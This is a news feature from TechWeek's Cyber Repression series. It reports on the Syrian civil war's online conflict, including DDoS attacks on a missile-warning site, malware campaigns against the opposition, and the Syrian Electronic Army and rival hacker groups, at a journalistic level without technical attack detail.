Syria’s Online Conflict: The Hackers And Their Weapons

Cyber Repression: In Western consciousness, there is one name that immediately comes to mind when thinking about Syria’s cyber conflict – the Syrian Electronic Army. That’s because many of its targets have been Western media organisations helping mould the minds of the people. But the online war is vast and complex. Some attacks have far more serious ramifications than the defacements and Twitter account hijacks that make headlines almost every week.

For two days last month, a website designed to give Syrians warnings about incoming Scud missiles was taken offline by a massive distributed denial of service (DDoS) attack. The founder of the site, Dlshad Olthman, tells me he was up from 6pm on 9 July until 4am the next morning manually blocking IP addresses used as part of the attack. “I then rose a white flag. I couldn’t handle it anymore,” he says.

Botnet knocks missile warning site offline

Once he’d brought in analysts from VirtualRoad.org, which provides security for human rights organisations, they determined 10,000 bots were used in the assault on the Aymta (the name translates to “when” in Arabic) website. Most of the IP addresses were from states of the old Soviet Union, including Russia and Ukraine. Some were based in Iran. Othman is certain nation states sponsored the DDoS. He suspects the backing of President Bashar al-Assad. “This is government attacking – it’s not small private organisations,” he says. “I’ve been doing IT stuff for 10 years – I’ve never seen an attack like this.”

DDoS is usually just an annoyance, but in cases such as this it can have profound real-world effects. Launched in late June, Aymta is designed to let select, trusted sources in Syria share information securely about Scud missiles and their potential targets. These weapons, once launched, are easily visible to those inside the war-torn country but have still killed hundreds, possibly thousands. This Scud threat data is then disseminated to people via text message, email, RSS feed or via a broadcast on satellite TV or radio not controlled by the state (a smartphone application is coming soon too). A map also estimates what bit of land the SCUD is flying over. Users can then organise effective evacuations. If the site goes down, it could mean the difference between life and death.

Othman, a systems engineer with a passion for human rights, says 3,000 have already registered for the text updates. He believes more will join and, now he has started hosting the site on a properly scalable cloud service, Othman hopes it will remain up. In a country that has now seen over one million deaths as a result of the civil war, many will be hoping the site doesn’t just stay online but expands as quickly as possible.

The official website of the National Coalition for the Forces of the Revolution and the Syrian Opposition also had its website, etilaf.org, knocked offline by a DDoS last month. The site was down for a day, says Tarek al-Jazairi, new media consultant for the Syrian National Coalition, who claims a lot of the IPs used in the attack came from Russia and Iran, possibly linking it with the hit on Aymta. Given the site is used for spreading information for supporters, it is also an obvious target. Information is particularly powerful in wartime, making DDoS a more powerful weapon.

Malware menace

Outside of DDoS strikes, the opposition’s enemies have shown off many other offensive skills this year. Citizen Lab spotted two attacks in mid-June. The first saw a piece of malware implanted into a legitimate VPN client called Freegate, which opposition forces were using to avoid snooping from the regime. Hackers infiltrated a private social media group to spread the booby-trapped software, which contained a remote access Trojan, typically used in government-backed surveillance operations. It does keylogging, can activate victims’ webcams and steal their files.

Another campaign involved spear phishing, emails apparently targeting high-level members of the Syrian opposition, which contained links that eventually infected users with malware if they clicked through. The software was hooked up to a command and control server based in Syria, with a SyriaTel IP address. SyriaTel is a telecoms company that is owned by Rami Makhlouf, a cousin of President Bashar al-Assad, who has previously been linked with the Syrian Electronic Army.

Other malware campaigns were spotted throughout 2012, including one that used a fake YouTube site and Adobe Flash Player update to get nasty software onto target machines. A site simply known as Syrian Malware now tracks attacks.

Syrian Electronic Army

Then there is the omnipresent Syrian Electronic Army, with its mass defacements, Twitter hijacks and more. A spokesperson from the Syrian Electronic Army tells TechWeek the group does do malware, usually in watering hole campaigns. “Sometimes we inject a code in some page and let the target visit it. That will run the malware and send the stored passwords in his PC to a website belonging to SEA,” they say. Perhaps they were responsible for those above campaigns, even if they won’t admit it, but the spokesperson denies they do any DDoSing.

Affiliated groups may be doing that, however. A group called Syrian Hackers School was running a Facebook page back in 2011 that disseminated denial of service (DoS) software designed to target media organisation websites (TechWeek could not find the page at the time of publication).

The SEA spokesperson denies claims, reiterated by the Coalition’s al-Jazairi, the group is financially supported by Makhlouf, the owner of SyriaTel and cousin of Bashar al-Assad, and based out of an office block in Dubai. “We are based in Syria… A huge number of Syrians volunteered in the SEA, you can say thousands.” There is still no concrete evidence linking the SEA with the President’s regime, even if Bashar al-Assad expressed his support of the group’s actions back in 2011.

The SEA spokesperson claims the group started out by attacking Syrian opposition websites, Facebook pages and Twitter. “But we found out that they are just puppets controlled by their owners, so we started targeting their bosses like Qatar, Saudi Arabia, America.” They are also keen on attacking Israeli sites, in support of their “Palestinian brothers”, and British media organisations. Every week, it compromises social media accounts and defaces websites to spread its messages of support for President Bashar al-Assad.

The Army appears to have plenty of support from a wide range of other cyber groups. These include the Yemen Hackers, the Muslim Hackers and the Arab Hackers For Free Palestine, as well as the Syrian Hackers School.

Limited rebel power?

As for the SEA’s enemies, they appear to be disparate, mirroring the corporeal world,  and comparatively limited in their capabilities. The SEA says it doesn’t see much offensive work from its opponents.

One new group, the Al-Nusra Electronic Army, which is believed to have affiliations with the rebel Al-Nusra Front, itself thought to be an arm of Al Qaeda, has been busy of late, however. It defaced the Syrian Commission on Financial Markets and Securities earlier this month and did the same to the Russian government in March. The below images show the two defacements:

Another group,  the Pirates of Aleppo, is now operating in Turkey, near the Syrian border. It was established by a former SEA employee, working alongside another collective, the Falcons of Damascus. The Pirates’ leader, Ahmed Hiedar, told the Global Post earlier this year that it had hacked into live state television broadcasts 13 times.

Sectarian schisms and regime rule

Helmi Noman, senior researcher at Citizen Lab, is concerned about the increasingly sectarian aspect of the cyber conflict, which stretches back to the start of the war. The schism between the Shia and Sunni branches of Islam has been increasingly apparent across Syria, with the Alawite Shi’ite sect of the regime battling with the various Sunni groups. “The ideological identity of such warriors is visible on the defacement messages they leave on some of the compromised websites. In September 2011, for example, hackers defaced a Syrian website devoted to Grand Ayatollah Khamenei, the Supreme Leader of Iran and figurehead of the Shi’ite Muslim conservative establishment,” Noman tells TechWeek.

“The defacement was dedicated to the ‘revolutionaries among the Syrian people’ and the ‘martyrs of Syria’, but more importantly it said, ‘Syria will remain a castle of Ahl Al-Sunnah’, an Arabic term meaning Sunni community. It added that ‘Iran’s dogs will be relegated to the garbage heap of history’.”

Power is another issue. As the regime has control over much of the nation’s critical infrastructure, organised power outages are frequent, Noman says. The major national Internet outages have gained plenty of press, but the localised power outages that knock out all forms of electronic communications cause big problems. “There is a serious electricity problem, which results in a lack of telecoms, not just the Internet,” Noman adds.

ISPs are also tight with the government, meaning man-in-the-middle snooping and other attacks from the network level are also used frequently, according to Othman. Having such power over content, not just on the Internet but across all forms of media, helps push propaganda campaigns too.

In Syria’s online conflict, the regime certainly has the upper hand.

This article is part of TechWeek’s Cyber Repression Series. Click through for other articles on attacks stemming from China on spiritual activists and military bodies,  IP tracking in Bahrain, attacks surrounding the Zimbabwean election, and strikes on the Tibetan community, which is getting little help from the security community.

What do you know about Internet security? Find out with our quiz!